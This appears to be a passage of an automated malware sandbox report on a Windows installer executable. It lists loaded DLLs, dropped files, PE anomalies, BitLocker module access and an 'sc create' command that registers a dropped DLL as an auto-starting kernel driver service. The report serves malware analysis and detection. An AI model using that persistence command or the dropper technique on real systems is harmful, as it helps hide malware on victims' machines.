Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic file information: File size 7495744 > 1048576
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000E.00000003.2244717794.0000000001500000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000E.00000003.2244632805.0000000004010000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.14.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009F57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,11_2_009F57D0
Source: update.vac.2.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.7.drStatic PE information: real checksum: 0x0 should be: 0x343ce5
Source: update.vac.8.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343ce5
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic PE information: real checksum: 0x0 should be: 0x72e436
Source: hrsw.vbc.8.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: tProtect.dll.14.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.2.drStatic PE information: section name: .00cfg
Source: update.vac.2.drStatic PE information: section name: .voltbl
Source: update.vac.2.drStatic PE information: section name: .8Tk
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.7.drStatic PE information: section name: .didata
Source: 7zr.exe.8.drStatic PE information: section name: .sxdata
Source: update.vac.8.drStatic PE information: section name: .00cfg
Source: update.vac.8.drStatic PE information: section name: .voltbl
Source: update.vac.8.drStatic PE information: section name: .8Tk
Source: hrsw.vbc.8.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.8.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.8.drStatic PE information: section name: .8Tk
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C2E86EB push ecx; ret 8_2_6C2E86FE
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C190F00 push ss; retn 0001h8_2_6C190F0A
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3B6F10 push eax; ret 8_2_6C3B6F2E
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C31B9F4 push 004AC35Ch; ret 8_2_6C31BA0E
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3B7290 push eax; ret 8_2_6C3B72BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009745F4 push 00A1C35Ch; ret 11_2_0097460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A0FB10 push eax; ret 11_2_00A0FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A0FE90 push eax; ret 11_2_00A0FEBE
Source: update.vac.2.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: update.vac.8.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: hrsw.vbc.8.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1K545.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1K545.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7TRUA.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeFile created: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeFile created: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7TRUA.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1K545.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7TRUA.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
